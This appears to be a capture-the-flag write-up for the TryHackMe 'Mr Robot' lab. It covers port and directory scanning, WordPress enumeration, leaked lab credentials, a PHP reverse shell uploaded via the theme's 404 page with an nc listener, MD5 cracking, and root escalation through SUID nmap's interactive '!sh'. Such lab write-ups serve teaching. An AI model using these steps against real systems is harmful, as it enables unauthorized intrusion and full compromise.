Mr Robot THM{}

80, Wordpress, SUID

Nmap

nmap -T4 10.10.19.91

PORT    STATE  SERVICE
22/tcp  closed ssh
80/tcp  open   http
443/tcp open   https

Gobuster

gobuster dir -u 10.10.19.91 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt Interesting directories

http://10.10.19.91/wp-login.php      WORDPRESS LOGIN
http://10.10.19.91/0/                WORDPRESS BLOG
http://10.10.19.91/image/            WORDPRESS BLOG IMAGE
http://10.10.19.91/wp-content/       WITE BLACKGROUNG
http://10.10.19.91/admin/            RELOADING WEB
http://10.10.19.91/license           USER:PASSWORD in Inspector
http://10.10.19.91/readme            USELESS MESSAGE
http://10.10.19.91/robots            FIRST KEY

Wpscan

 
[+] WordPress version 4.3.1 identified (Insecure, released on 2015-09-15).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://10.10.19.91/082c96f.html, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.3.1'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://10.10.19.91/082c96f.html, Match: 'WordPress 4.3.1'
 
[+] WordPress theme in use: twentyfifteen
 | Location: http://10.10.19.91/wp-content/themes/twentyfifteen/
 | Last Updated: 2022-01-25T00:00:00.000Z
 | Readme: http://10.10.19.91/wp-content/themes/twentyfifteen/readme.txt
 | [!] The version is out of date, the latest version is 3.1
 | Style URL: http://10.10.19.91/wp-content/themes/twentyfifteen/style.css?ver=4.3.1
 | Style Name: Twenty Fifteen
 | Style URI: https://wordpress.org/themes/twentyfifteen/
 | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.10.19.91/wp-content/themes/twentyfifteen/style.css?ver=4.3.1, Match: 'Version: 1.3'

First key

Information obtained:

http://wordpress.org/?v=4.3.1
elliot:ER28-0652

In the folder /robots, we find the first key.

User-agent: *
fsocity.dic
key-1-of-3.txt

If we go to /fsocity.dic, we download a dictionary. Will be usefull for a future bruteforce attack. Furthermore, if we go to key-1-of-3.txt, we find the first flag.

Wordpress ro reverse shell

As we did in the Internal machine, we can establish a reverse shell using wordpress. For that we use the information provided in this web: https://www.hacknos.com/wordpress-shell-upload/ using the 404.php method. For the reverse shell, we use the pentestmonkey php reverse shell: https://github.com/pentestmonkey/php-reverse-shell and nc -lvnp 5555on our machine.

We can upgrade our shell using this info: https://www.metahackers.pro/upgrade-shell-to-fully-interactive-tty-shell/

Linpeas

SUID
-rwsr-xr-x 1 root root 493K Nov 13  2015 /usr/local/bin/nmap

Second key

We go to the /home directory and foung this user and password on md5:robot:c3fcd3d76192e4007dfb496cca67e13b And the cracked password is abcdefghijklmnopqrstuvwxyz. Now we login as robot and open the file key-2-of-3.txt.

Third key

As SUID says, there is something with nmap. To exploit it, just initiate it with interactive mode nmap --interactive and write !sh.

# whoami
root

# ls
firstboot_done  key-3-of-3.txt

80, Wordpress, SUID​

Nmap​

Gobuster​

Wpscan​

First key​

Wordpress ro reverse shell​

Linpeas​

Second key​

Third key​